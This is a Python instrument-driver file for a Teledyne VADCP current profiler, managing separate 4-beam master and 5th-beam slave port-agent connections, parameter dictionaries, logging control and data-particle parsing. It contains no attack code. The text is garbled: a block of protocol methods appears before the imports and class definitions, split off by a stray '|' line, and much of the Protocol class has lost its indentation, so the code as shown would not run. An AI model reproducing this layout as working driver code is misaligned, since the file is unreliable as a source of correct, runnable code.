        if parameters is None or WorkhorseParameter.ALL in parameters:
            parameters = self._param_dict.get_keys()
        # filter out the engineering parameters and ALL
        parameters = [p for p in parameters if not WorkhorseEngineeringParameter.has(p) and p != WorkhorseParameter.ALL]
        # Get old param dict config.
        old_config = self._param_dict.get_config()
        if parameters:
            # MASTER
            master_params = [p for p in parameters if '_5th' not in p]
            if master_params:
                resp = self._get_params(master_params, SlaveProtocol.FOURBEAM)
                self._param_dict.update_many(resp)
            # SLAVE
            slave_params = [p.replace('_5th', '') for p in parameters if '_5th' in p]
            if slave_params:
                resp = self._get_params(slave_params, SlaveProtocol.FIFTHBEAM)
                # Match through the regex-bearing slave dict, then copy the
                # values into the primary dict's '_5th' entries.
                self._param_dict2.update_many(resp)
                for key, value in self._param_dict2.get_all().iteritems():
                    self._param_dict.set_value(key, value)
        new_config = self._param_dict.get_config()
        # Check if there is any changes. Ignore TT
        if not dict_equal(new_config, old_config, ['TT']) or kwargs.get('force'):
            self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)
    def _execute_set_params(self, commands, connection):
        """
        Send a batch of pre-built set commands on one connection, then match
        and parse the combined response (including any error text).
        """
        if commands:
            # we are going to send the concatenation of all our set commands
            self._linebuf[connection] = ''
            self._do_cmd_direct(''.join(commands), connection=connection)
            # we'll need to build a regular expression to retrieve all of the responses
            # including any possible errors
            if len(commands) == 1:
                regex = re.compile(r'(%s.*?)\r\n>' % commands[-1].strip(), re.DOTALL)
            else:
                regex = re.compile(r'(%s.*?%s.*?)\r\n>' % (commands[0].strip(), commands[-1].strip()), re.DOTALL)
            response = self._get_response(response_regex=regex, connection=connection)
            self._parse_set_response(response[0], None)
    def _set_params(self, *args, **kwargs):
        """
        Issue commands to the instrument to set various parameters
        """
        self._verify_not_readonly(*args, **kwargs)
        params = args[0]
        changed = []
        old_config = self._param_dict.get_config()
        master_commands = []
        slave_commands = []
        # Split changed parameters into master and slave ('_5th') batches.
        for key, val in params.iteritems():
            if WorkhorseEngineeringParameter.has(key):
                continue
            if val != old_config.get(key):
                changed.append(key)
                if '_5th' in key:
                    slave_commands.append(self._build_set_command(
                        WorkhorseInstrumentCommands.SET, key.replace('_5th', ''), val))
                else:
                    master_commands.append(self._build_set_command(WorkhorseInstrumentCommands.SET, key, val))
        self._execute_set_params(master_commands, connection=SlaveProtocol.FOURBEAM)
        self._execute_set_params(slave_commands, connection=SlaveProtocol.FIFTHBEAM)
        # Handle engineering parameters
        force = False
        if WorkhorseParameter.CLOCK_SYNCH_INTERVAL in params:
            if (params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL] != self._param_dict.get(
                    WorkhorseParameter.CLOCK_SYNCH_INTERVAL)):
                self._param_dict.set_value(WorkhorseParameter.CLOCK_SYNCH_INTERVAL,
                                           params[WorkhorseParameter.CLOCK_SYNCH_INTERVAL])
                self.start_scheduled_job(WorkhorseParameter.CLOCK_SYNCH_INTERVAL, WorkhorseScheduledJob.CLOCK_SYNC,
                                         WorkhorseProtocolEvent.SCHEDULED_CLOCK_SYNC)
                force = True
        if WorkhorseParameter.GET_STATUS_INTERVAL in params:
            if (params[WorkhorseParameter.GET_STATUS_INTERVAL] != self._param_dict.get(
                    WorkhorseParameter.GET_STATUS_INTERVAL)):
                self._param_dict.set_value(WorkhorseParameter.GET_STATUS_INTERVAL,
                                           params[WorkhorseParameter.GET_STATUS_INTERVAL])
                self.start_scheduled_job(WorkhorseParameter.GET_STATUS_INTERVAL,
                                         WorkhorseScheduledJob.GET_CONFIGURATION,
                                         WorkhorseProtocolEvent.SCHEDULED_GET_STATUS)
                force = True
        self._update_params(params=changed, force=force)
        return None
    def _send_break(self, duration=1000, connection=None):
        """
        Send a BREAK to attempt to wake the device.
        """
        self._linebuf[connection] = ''
        self._promptbuf[connection] = ''
        self._send_break_cmd(duration, connection=connection)
        self._get_response(expected_prompt=WorkhorsePrompt.BREAK, connection=connection)
    def _start_logging(self, timeout=TIMEOUT, connection=None):
        """
        Command the instrument to start logging
        @param timeout: how long to wait for a prompt
        @throws: InstrumentProtocolException if failed to start logging
        """
        try:
            start = WorkhorseInstrumentCommands.START_LOGGING
            # start the slave first, it collects on signal from master
            self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FIFTHBEAM)
            self._do_cmd_resp(start, timeout=timeout, connection=SlaveProtocol.FOURBEAM)
        except InstrumentException:
            # Best effort: leave both instruments stopped if either failed.
            self._stop_logging()
            raise
    def _stop_logging(self):
        """Send breaks to both instruments to stop logging."""
        # stop the master first (slave only collects on signal from master)
        self._send_break(connection=SlaveProtocol.FOURBEAM)
        self._send_break(connection=SlaveProtocol.FIFTHBEAM)
    def _discover(self, connection=None):
        """
        Discover current state; can be COMMAND or AUTOSAMPLE or UNKNOWN.
        @throws InstrumentTimeoutException if the device cannot be woken.
        @throws InstrumentStateException if the device response does not correspond to
        an expected state.
        """
        states = set()
        command = WorkhorseProtocolState.COMMAND
        auto = WorkhorseProtocolState.AUTOSAMPLE
        protocol_state = command
        for connection in self.connections:
            try:
                # A successful wakeup means the instrument answers prompts,
                # i.e. it is in COMMAND; a timeout implies AUTOSAMPLE.
                self._wakeup(3, connection=connection)
                states.add(command)
            except InstrumentException:
                states.add(auto)
        if len(states) == 1:
            # states match, return this state
            # BUGFIX: return immediately -- previously execution fell through
            # to _stop_logging(), which sent breaks even when both
            # instruments agreed (and could return AUTOSAMPLE after having
            # just stopped logging).
            return states.pop()
        # states don't match: force both instruments into a known state
        self._stop_logging()
        return protocol_state
    def _run_test(self, *args, **kwargs):
        """
        Run the built-in test (PT200) on both connections and return the
        concatenated, connection-labeled results.
        """
        kwargs['timeout'] = 30
        kwargs['expected_prompt'] = WorkhorsePrompt.COMMAND
        result = []
        for connection in self.connections:
            result.append(connection)
            kwargs['connection'] = connection
            result.append(self._do_cmd_resp(WorkhorseInstrumentCommands.RUN_TEST_200, *args, **kwargs))
        return NEWLINE.join(result)
    @contextmanager
    def _pause_logging(self):
        """Context manager: stop logging on entry, restart it on exit."""
        try:
            self._stop_logging()
            yield
        finally:
            self._start_logging()
    ########################################################################
    # COMMAND handlers.
    ########################################################################
    def _handler_command_acquire_status(self, *args, **kwargs):
        """
        execute a get status
        @return next_state, (next_state, result) if successful.
        @throws InstrumentProtocolException from _do_cmd_resp.
        """
        next_state = None
        super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FOURBEAM)
        super(Protocol, self)._do_acquire_status(connection=SlaveProtocol.FIFTHBEAM)
        # Wait for the full complement of status particles from both heads.
        result = self.wait_for_particles([VADCPDataParticleType.VADCP_SYSTEM_CONFIGURATION_SLAVE,
                                          VADCPDataParticleType.VADCP_COMPASS_CALIBRATION_SLAVE,
                                          VADCPDataParticleType.VADCP_ANCILLARY_SYSTEM_DATA_SLAVE,
                                          VADCPDataParticleType.VADCP_TRANSMIT_PATH_SLAVE,
                                          WorkhorseDataParticleType.ADCP_SYSTEM_CONFIGURATION,
                                          WorkhorseDataParticleType.ADCP_COMPASS_CALIBRATION,
                                          WorkhorseDataParticleType.ADCP_ANCILLARY_SYSTEM_DATA,
                                          WorkhorseDataParticleType.ADCP_TRANSMIT_PATH])
        return next_state, (next_state, result)
    def _handler_command_recover_autosample(self):
        """PD0 data seen while in COMMAND: break out of autosample."""
        log.info('PD0 sample detected in COMMAND, not allowed in VADCP. Sending break')
        self._stop_logging()
    ######################################################
    # DIRECT_ACCESS handlers
    ######################################################
    def _handler_direct_access_execute_direct(self, data):
        """
        Pass raw direct-access data through to the instrument.
        NOTE(review): _do_cmd_direct is called here without a connection
        keyword, so it raises unless a default is supplied upstream --
        confirm intended behavior for direct access.
        """
        next_state = None
        result = []
        self._do_cmd_direct(data)
        # add sent command to list for 'echo' filtering in callback
        self._sent_cmds.append(data)
        return next_state, (next_state, result)
|
import copy
import functools
import json
import time
import re
from contextlib import contextmanager
import mi.instrument.teledyne.workhorse.particles as particles
from mi.core.log import get_logger
from mi.instrument.teledyne.workhorse.pd0_parser import AdcpPd0Record
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_protocol import RE_PATTERN, DEFAULT_CMD_TIMEOUT, DEFAULT_WRITE_DELAY
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility, ProtocolParameterDict
from mi.core.time_tools import get_timestamp_delayed
from mi.core.util import dict_equal
from mi.core.common import BaseEnum, InstErrorCode
from mi.core.exceptions import InstrumentConnectionException, SampleException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentProtocolException
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentException
from mi.core.instrument.instrument_driver import SingleConnectionInstrumentDriver, DriverEvent
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.port_agent_client import PortAgentClient, PortAgentPacket
from mi.instrument.teledyne.workhorse.driver import WorkhorseParameter
from mi.instrument.teledyne.workhorse.driver import WorkhorsePrompt
from mi.instrument.teledyne.workhorse.driver import NEWLINE
from mi.instrument.teledyne.workhorse.driver import parameter_regexes
from mi.instrument.teledyne.workhorse.driver import parameter_extractors
from mi.instrument.teledyne.workhorse.driver import parameter_formatters
from mi.instrument.teledyne.workhorse.driver import parameter_defaults
from mi.instrument.teledyne.workhorse.driver import parameter_types
from mi.instrument.teledyne.workhorse.driver import parameter_names
from mi.instrument.teledyne.workhorse.driver import parameter_descriptions
from mi.instrument.teledyne.workhorse.driver import parameter_ranges
from mi.instrument.teledyne.workhorse.driver import parameter_startup
from mi.instrument.teledyne.workhorse.driver import parameter_direct
from mi.instrument.teledyne.workhorse.driver import parameter_visibility
from mi.instrument.teledyne.workhorse.driver import parameter_units, WorkhorseProtocol
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolState
from mi.instrument.teledyne.workhorse.driver import WorkhorseInstrumentCommands
from mi.instrument.teledyne.workhorse.driver import WorkhorseProtocolEvent
from mi.instrument.teledyne.workhorse.driver import ADCP_COMPASS_CALIBRATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_PD0_PARSED_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_SYSTEM_CONFIGURATION_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_ANCILLARY_SYSTEM_DATA_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import ADCP_TRANSMIT_PATH_REGEX_MATCHER
from mi.instrument.teledyne.workhorse.driver import WorkhorseEngineeringParameter
from mi.instrument.teledyne.workhorse.driver import TIMEOUT
from mi.instrument.teledyne.workhorse.driver import WorkhorseScheduledJob
from mi.instrument.teledyne.workhorse.particles import VADCPDataParticleType, WorkhorseDataParticleType
log = get_logger()
# Per-beam default overrides: start from the common Workhorse defaults and
# override the values that differ between the 4-beam master and the 5th-beam
# slave (mode, sync delay, blanking, cell geometry, ping timing).
master_parameter_defaults = copy.deepcopy(parameter_defaults)
slave_parameter_defaults = copy.deepcopy(parameter_defaults)

master_parameter_defaults.update({
    WorkhorseParameter.TRANSDUCER_DEPTH: 2000,
    WorkhorseParameter.RDS3_MODE_SEL: 1,
    WorkhorseParameter.SYNCH_DELAY: 100,
    WorkhorseParameter.BLANK_AFTER_TRANSMIT: 88,
    WorkhorseParameter.NUMBER_OF_DEPTH_CELLS: 220,
    WorkhorseParameter.DEPTH_CELL_SIZE: 100,
    WorkhorseParameter.TIME_PER_PING: '00:01.00',
})

slave_parameter_defaults.update({
    WorkhorseParameter.TRANSDUCER_DEPTH: 2000,
    WorkhorseParameter.RDS3_MODE_SEL: 2,
    WorkhorseParameter.SYNCH_DELAY: 0,
    WorkhorseParameter.BLANK_AFTER_TRANSMIT: 83,
    WorkhorseParameter.NUMBER_OF_DEPTH_CELLS: 220,
    WorkhorseParameter.DEPTH_CELL_SIZE: 94,
    WorkhorseParameter.TIME_PER_PING: '00:00.00',
})
class SlaveProtocol(BaseEnum):
    """
    Names for the two port agent connections managed by this driver:
    the 4-beam (master) assembly and the 5th-beam (slave) assembly.
    These values key every per-connection dict in the driver and protocol.
    """
    FOURBEAM = '4Beam'
    FIFTHBEAM = '5thBeam'
class InstrumentDriver(SingleConnectionInstrumentDriver):
    """
    VADCP instrument driver.

    Unlike the single-connection base class, this driver manages TWO port
    agent connections, one per beam assembly (see SlaveProtocol): the 4-beam
    master and the 5th-beam slave. self._connection is therefore a dict keyed
    by SlaveProtocol rather than a single client.
    """

    def __init__(self, evt_callback, refdes=None):
        """
        InstrumentDriver constructor.
        @param evt_callback Driver process event callback.
        @param refdes Reference designator, used to auto-discover the two
            port agent configurations when none are supplied.
        """
        SingleConnectionInstrumentDriver.__init__(self, evt_callback, refdes)
        # multiple portAgentClient: one client per connection name
        self._connection = {}

    def _build_protocol(self):
        """
        Construct the driver protocol state machine.
        """
        self._protocol = Protocol(WorkhorsePrompt, NEWLINE, self._driver_event,
                                  connections=[SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM])

    def _handler_inst_disconnected_connect(self, *args, **kwargs):
        """
        Rebuild the protocol and hand it the already-established port agent
        clients for both beams.
        @return (DriverConnectionState.CONNECTED, None)
        """
        self._build_protocol()
        self.set_init_params({})
        self._protocol.connections[SlaveProtocol.FOURBEAM] = self._connection[SlaveProtocol.FOURBEAM]
        self._protocol.connections[SlaveProtocol.FIFTHBEAM] = self._connection[SlaveProtocol.FIFTHBEAM]
        return DriverConnectionState.CONNECTED, None

    def _handler_disconnected_connect(self, *args, **kwargs):
        """
        Establish communications with the device via port agent / logger and
        construct and initialize a protocol FSM for device interaction.
        Both connections must come up; on connection failure the driver
        reverts to UNCONFIGURED.
        @return (next_state, result) tuple, (DriverConnectionState.CONNECTED, None) if successful.
        """
        next_state = DriverConnectionState.INST_DISCONNECTED
        result = None
        # for Master first
        # NOTE(review): if the master init_comms raises, the slave connection is
        # never attempted and any partial state is left as-is — confirm intended.
        try:
            self._connection[SlaveProtocol.FOURBEAM].init_comms()
            self._connection[SlaveProtocol.FIFTHBEAM].init_comms()
        except InstrumentConnectionException as e:
            log.error("Connection Exception: %s", e)
            log.error("Instrument Driver returning to unconfigured state.")
            next_state = DriverConnectionState.UNCONFIGURED
        # carry any supplied startup configuration into the protocol
        init_config = {}
        if len(args) > 0 and isinstance(args[0], dict):
            init_config = args[0]
        self.set_init_params(init_config)
        return next_state, (next_state, result)

    def _handler_connected_disconnect(self, *args, **kwargs):
        """
        Disconnect to the device via port agent / logger and destroy the protocol FSM.
        @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None) if successful.
        """
        next_state = DriverConnectionState.UNCONFIGURED
        result = None
        # stop comms on every port agent client, not just one
        for connection in self._connection.values():
            connection.stop_comms()
        self._destroy_protocol()
        return next_state, (next_state, result)

    def _handler_connected_connection_lost(self, *args, **kwargs):
        """
        The device connection was lost. Stop comms, destroy protocol FSM and revert to unconfigured state.
        @return (next_state, result) tuple, (DriverConnectionState.UNCONFIGURED, None).
        """
        for connection in self._connection.values():
            connection.stop_comms()
        self._destroy_protocol()
        return DriverConnectionState.UNCONFIGURED, None

    def _build_connection(self, *args, **kwargs):
        """
        Constructs and returns a Connection object according to the given
        configuration. The connection object is a LoggerClient instance in
        this base class. Subclasses can overwrite this operation as needed.
        The value returned by this operation is assigned to self._connection
        and also to self._protocol._connection upon entering in the
        DriverConnectionState.CONNECTED state.
        @param all_configs configuration dict (keyed by SlaveProtocol value)
        @returns a dictionary of Connection instances, which will be assigned to self._connection
        @throws InstrumentParameterException Invalid configuration.
        """
        # config may arrive via kwargs, positionally, or be auto-discovered
        # from the reference designator ('-4' master, '-5' slave suffixes)
        all_configs = kwargs.get('config', None)  # via kwargs
        if all_configs is None and len(args) > 0:
            all_configs = args[0]  # via first argument
        if all_configs is None:
            all_configs = {SlaveProtocol.FOURBEAM: self._get_port_agent_config(self.refdes + '-4'),
                           SlaveProtocol.FIFTHBEAM: self._get_port_agent_config(self.refdes + '-5')}
        for key in all_configs:
            if all_configs[key] is None:
                raise InstrumentParameterException('No %s port agent config supplied and failed to auto-discover' % key)
        connections = {}
        for name, config in all_configs.items():
            if not isinstance(config, dict):
                continue
            if 'mock_port_agent' in config:
                mock_port_agent = config['mock_port_agent']
                # check for validity here...
                if mock_port_agent is not None:
                    connections[name] = mock_port_agent
            else:
                try:
                    addr = config['addr']
                    port = config['port']
                    cmd_port = config.get('cmd_port')
                    if isinstance(addr, basestring) and isinstance(port, int) and len(addr) > 0:
                        # bind the connection name into the data callback so
                        # incoming packets can be routed per-connection
                        callback = functools.partial(self._got_data, connection=name)
                        connections[name] = PortAgentClient(addr, port, cmd_port, callback,
                                                            self._lost_connection_callback)
                    else:
                        raise InstrumentParameterException('Invalid comms config dict in build_connections.')
                except (TypeError, KeyError) as e:
                    raise InstrumentParameterException('Invalid comms config dict.. %r' % e)
        return connections

    def get_direct_config(self):
        """
        Note - must override if instrument driver has more than one instrument configuration.
        :return: list of dictionaries containing direct access configuration and commands,
            one entry per connection (master first, then 5th beam).
        """
        config = []
        if self._protocol:
            for idx, connection in enumerate([SlaveProtocol.FOURBEAM, SlaveProtocol.FIFTHBEAM]):
                config.append({})
                # base config comes from the protocol; per-connection fields below
                config[idx] = self._protocol.get_direct_config()
                if connection is SlaveProtocol.FOURBEAM:
                    config[idx]['title'] = 'Beams 1-4'
                if connection is SlaveProtocol.FIFTHBEAM:
                    config[idx]['title'] = '5th Beam'
                config[idx]['ip'] = self._port_agent_config.get(connection, {}).get('host', 'uft20')
                config[idx]['data'] = self._port_agent_config.get(connection, {}).get('ports', {}).get('da')
                config[idx]['sniffer'] = \
                    self._port_agent_config.get(connection, {}).get('ports', {}).get('sniff')
        return config

    def _got_data(self, port_agent_packet, connection=None):
        """
        Port agent callback. Routes config and status packets to driver-level
        handling; everything else is forwarded to the protocol tagged with the
        originating connection.
        :param port_agent_packet: incoming PortAgentPacket (or an Exception)
        :param connection: SlaveProtocol value identifying the source
        """
        if isinstance(port_agent_packet, Exception):
            return self._got_exception(port_agent_packet)
        if isinstance(port_agent_packet, PortAgentPacket):
            packet_type = port_agent_packet.get_header_type()
            data = port_agent_packet.get_data()
            if packet_type == PortAgentPacket.PORT_AGENT_CONFIG:
                # port agent sent its JSON configuration; cache and publish it
                try:
                    paconfig = json.loads(data)
                    self._port_agent_config[connection] = paconfig
                    self._driver_event(DriverAsyncEvent.DRIVER_CONFIG, paconfig)
                except ValueError as e:
                    log.exception('Unable to parse port agent config: %r %r', data, e)
            elif packet_type == PortAgentPacket.PORT_AGENT_STATUS:
                # connection state change reported by the port agent
                current_state = self._connection_fsm.get_current_state()
                if data == 'DISCONNECTED':
                    self._async_raise_event(DriverEvent.PA_CONNECTION_LOST)
                elif data == 'CONNECTED':
                    if current_state == DriverConnectionState.INST_DISCONNECTED:
                        self._async_raise_event(DriverEvent.CONNECT)
            else:
                # instrument data: deliver to the protocol for this connection
                if connection and self._protocol:
                    self._protocol.got_data(port_agent_packet, connection=connection)
class Protocol(WorkhorseProtocol):
def __init__(self, prompts, newline, driver_event, connections=None):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
command response logic.
@param newline The device newline.
@driver_event The callback for asynchronous driver events.
"""
if not type(connections) is list:
raise InstrumentProtocolException('Unable to instantiate multi connection protocol without connection list')
self._param_dict2 = ProtocolParameterDict()
# Construct superclass.
WorkhorseProtocol.__init__(self, prompts, newline, driver_event)
# Create multiple connection versions of the pieces of protocol involving data to/from the instrument
self._linebuf = {connection: '' for connection in connections}
self._promptbuf = {connection: '' for connection in connections}
self._last_data_timestamp = {connection: None for connection in connections}
self.connections = {connection: None for connection in connections}
self.chunkers = {connection: StringChunker(self.sieve_function) for connection in connections}
def _get_response(self, timeout=10, expected_prompt=None, response_regex=None, connection=None):
"""
Overridden to handle multiple port agent connections
"""
if connection is None:
raise InstrumentProtocolException('_get_response: no connection supplied!')
# Grab time for timeout and wait for prompt.
end_time = time.time() + timeout
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
if response_regex is None:
pattern = None
else:
pattern = response_regex.pattern
log.debug('_get_response: timeout=%s, prompt_list=%s, expected_prompt=%r, response_regex=%r, promptbuf=%r',
timeout, prompt_list, expected_prompt, pattern, self._promptbuf)
while time.time() < end_time:
if response_regex:
# noinspection PyArgumentList
match = response_regex.search(self._linebuf[connection])
if match:
return match.groups()
else:
for item in prompt_list:
index = self._promptbuf[connection].find(item)
if index >= 0:
result = self._promptbuf[connection][0:index + len(item)]
return item, result
time.sleep(.1)
raise InstrumentTimeoutException("in InstrumentProtocol._get_response()")
def _do_cmd_resp(self, cmd, *args, **kwargs):
"""
Overridden to handle multiple port agent connections
"""
connection = kwargs.get('connection')
if connection is None:
raise InstrumentProtocolException('_do_cmd_resp: no connection supplied!')
# Get timeout and initialize response.
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
expected_prompt = kwargs.get('expected_prompt', None)
response_regex = kwargs.get('response_regex', None)
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
self._do_cmd_no_resp(cmd, *args, **kwargs)
# Wait for the prompt, prepare result and return, timeout exception
if response_regex:
prompt = ""
result_tuple = self._get_response(timeout,
connection=connection,
response_regex=response_regex,
expected_prompt=expected_prompt)
result = "".join(result_tuple)
else:
(prompt, result) = self._get_response(timeout,
connection=connection,
expected_prompt=expected_prompt)
resp_handler = self._response_handlers.get((self.get_current_state(), cmd),
self._response_handlers.get(cmd, None))
resp_result = None
if callable(resp_handler):
resp_result = resp_handler(result, prompt)
return resp_result
def _send_data(self, data, write_delay=0, connection=None):
if connection is None:
raise InstrumentProtocolException('_send_data: no connection supplied!')
if write_delay == 0:
self.connections[connection].send(data)
else:
for char in data:
self.connections[connection].send(char)
time.sleep(write_delay)
def _do_cmd_no_resp(self, cmd, *args, **kwargs):
"""
Overridden to handle multiple port agent connections
"""
connection = kwargs.get('connection')
if connection is None:
raise InstrumentProtocolException('_do_cmd_no_resp: no connection supplied! %r %r %r' % (cmd, args, kwargs))
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
build_handler = self._build_handlers.get(cmd, None)
if not callable(build_handler):
log.error('_do_cmd_no_resp: no handler for command: %s' % cmd)
raise InstrumentProtocolException(error_code=InstErrorCode.BAD_DRIVER_COMMAND)
cmd_line = build_handler(cmd, *args)
# Wakeup the device, timeout exception as needed
self._wakeup(timeout, connection=connection)
# Clear line and prompt buffers for result, then send command.
self._linebuf[connection] = ''
self._promptbuf[connection] = ''
self._send_data(cmd_line, write_delay, connection=connection)
    def _do_cmd_direct(self, cmd, connection=None):
        """
        Issue an untranslated command to the instrument. No response is handled
        as a result of the command.
        @param cmd The high level command to issue
        @param connection connection name to send on (forwarded to _send_data,
            which raises if it is None)
        """
        # Send command.
        self._send_data(cmd, connection=connection)
########################################################################
# Incoming data (for parsing) callback.
########################################################################
def got_data(self, port_agent_packet, connection=None):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers.
Also add data to the chunker and when received call got_chunk
to publish results.
:param connection: connection which produced this packet
:param port_agent_packet: packet of data
"""
if connection is None:
raise InstrumentProtocolException('got_data: no connection supplied!')
data_length = port_agent_packet.get_data_length()
data = port_agent_packet.get_data()
timestamp = port_agent_packet.get_timestamp()
log.debug("Got Data: %r %r", connection, data)
log.debug("Add Port Agent Timestamp: %r %s", connection, timestamp)
if data_length > 0:
if self.get_current_state() == DriverProtocolState.DIRECT_ACCESS:
self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)
self.add_to_buffer(data, connection=connection)
self.chunkers[connection].add_chunk(data, timestamp)
(timestamp, chunk) = self.chunkers[connection].get_next_data()
while chunk:
self._got_chunk(chunk, timestamp, connection=connection)
(timestamp, chunk) = self.chunkers[connection].get_next_data()
########################################################################
# Incoming raw data callback.
########################################################################
    def got_raw(self, port_agent_packet, connection=None):
        """
        Called by the port agent client when raw data is available, such as data
        sent by the driver to the instrument, the instrument responses, etc.
        Delegates to publish_raw (a no-op in this protocol).
        :param connection: connection which produced this packet
        :param port_agent_packet: packet of data
        """
        self.publish_raw(port_agent_packet, connection)
    def publish_raw(self, port_agent_packet, connection=None):
        """Intentionally a no-op: this protocol does not publish raw particles."""
        pass
def add_to_buffer(self, data, connection=None):
"""
Add a chunk of data to the internal data buffers
buffers implemented as lifo ring buffer
:param data: bytes to add to the buffer
:param connection: connection which produced this packet
"""
# Update the line and prompt buffers.
self._linebuf[connection] += data
self._promptbuf[connection] += data
self._last_data_timestamp[connection] = time.time()
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
if len(self._linebuf[connection]) > self._max_buffer_size():
self._linebuf[connection] = self._linebuf[connection][self._max_buffer_size() * -1:]
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
if len(self._promptbuf[connection]) > self._max_buffer_size():
self._promptbuf[connection] = self._promptbuf[connection][self._max_buffer_size() * -1:]
log.debug("LINE BUF: %r", self._linebuf[connection][-50:])
log.debug("PROMPT BUF: %r", self._promptbuf[connection][-50:])
########################################################################
# Wakeup helpers.
########################################################################
    def _send_wakeup(self, connection=None):
        """
        Send a wakeup to the device on the given connection by writing a
        newline. Overridden by device specific subclasses.
        :param connection: connection name to send the wakeup on
        """
        self.connections[connection].send(NEWLINE)
def _wakeup(self, timeout, delay=1, connection=None):
"""
Clear buffers and send a wakeup command to the instrument
@param timeout The timeout to wake the device.
@param delay The time to wait between consecutive wakeups.
@throw InstrumentTimeoutException if the device could not be woken.
"""
if connection is None:
raise InstrumentProtocolException('_wakeup: no connection supplied!')
# Clear the prompt buffer.
log.trace("clearing promptbuf: %r", self._promptbuf)
self._promptbuf[connection] = ''
# Grab time for timeout.
starttime = time.time()
while True:
# Send a line return and wait a sec.
log.trace('Sending wakeup. timeout=%s', timeout)
self._send_wakeup(connection=connection)
time.sleep(delay)
log.trace("Prompts: %s", self._get_prompts())
for item in self._get_prompts():
log.trace("buffer: %r", self._promptbuf[connection])
log.trace("find prompt: %r", item)
index = self._promptbuf[connection].find(item)
log.trace("Got prompt (index: %s): %r ", index, self._promptbuf[connection])
if index >= 0:
log.trace('wakeup got prompt: %r', item)
return item
log.trace("Searched for all prompts")
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in _wakeup()")
def _build_param_dict(self):
# We're going to build two complete sets of ADCP parameters here
# one set for the master instrument and one for the slave
for param in parameter_regexes:
self._param_dict.add(param,
parameter_regexes.get(param),
parameter_extractors.get(param),
parameter_formatters.get(param),
type=parameter_types.get(param),
display_name=parameter_names.get(param),
description=parameter_descriptions.get(param),
range=parameter_ranges.get(param),
startup_param=parameter_startup.get(param, False),
direct_access=parameter_direct.get(param, False),
visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
default_value=master_parameter_defaults.get(param),
units=parameter_units.get(param))
for param in parameter_regexes:
# Scheduled events are handled by the master
if WorkhorseEngineeringParameter.has(param):
continue
self._param_dict.add(param + '_5th',
r'DONTMATCHMEIMNOTREAL!',
parameter_extractors.get(param),
parameter_formatters.get(param),
type=parameter_types.get(param),
display_name=parameter_names.get(param) + ' (5th beam)',
description=parameter_descriptions.get(param),
range=parameter_ranges.get(param),
startup_param=parameter_startup.get(param, False),
direct_access=parameter_direct.get(param, False),
visibility=parameter_visibility.get(param, ParameterDictVisibility.READ_WRITE),
default_value=slave_parameter_defaults.get(param),
units=parameter_units.get(param))
self._param_dict.set_default(WorkhorseParameter.CLOCK_SYNCH_INTERVAL)
self._param_dict.set_default(WorkhorseParameter.GET_STATUS_INTERVAL)
# now we're going to build a whole 'nother param dict for the slave parameters
# that contain regex values so we can fill them in easily...
for param in parameter_regexes:
# Scheduled events are handled by the master
if WorkhorseEngineeringParameter.has(param):
continue
self._param_dict2.add(param + '_5th',
parameter_regexes.get(param),
parameter_extractors.get(param),
parameter_formatters.get(param))
# #######################################################################
# Private helpers.
# #######################################################################
def _got_chunk(self, chunk, timestamp, connection=None):
"""
The base class got_data has gotten a chunk from the chunker.
Pass it to extract_sample with the appropriate particle
objects and REGEXes.
"""
if ADCP_PD0_PARSED_REGEX_MATCHER.match(chunk):
pd0 = AdcpPd0Record(chunk)
transform = pd0.coord_transform.coord_transform
# Only BEAM transform supported for VADCP
if transform != particles.Pd0CoordinateTransformType.BEAM:
raise SampleException('Received unsupported coordinate transform type: %s' % transform)
if connection == SlaveProtocol.FOURBEAM:
science = particles.VadcpBeamMasterParticle(pd0, port_timestamp=timestamp).generate()
config = particles.AdcpPd0ConfigParticle(pd0, port_timestamp=timestamp).generate()
engineering = particles.AdcpPd0EngineeringParticle(pd0, port_timestamp=timestamp).generate()
else:
science = particles.VadcpBeamSlaveParticle(pd0, port_timestamp=timestamp).generate()
config = particles.VadcpConfigSlaveParticle(pd0, port_timestamp=timestamp).generate()
engineering = particles.VadcpEngineeringSlaveParticle(pd0, port_timestamp=timestamp).generate()
out_particles = [science]
for particle in [config, engineering]:
if self._changed(particle):
out_particles.append(particle)
for particle in out_particles:
self._driver_event(DriverAsyncEvent.SAMPLE, particle)
else:
if connection == SlaveProtocol.FIFTHBEAM:
if self._extract_sample(particles.VadcpCompassCalibrationDataParticle,
ADCP_COMPASS_CALIBRATION_REGEX_MATCHER,
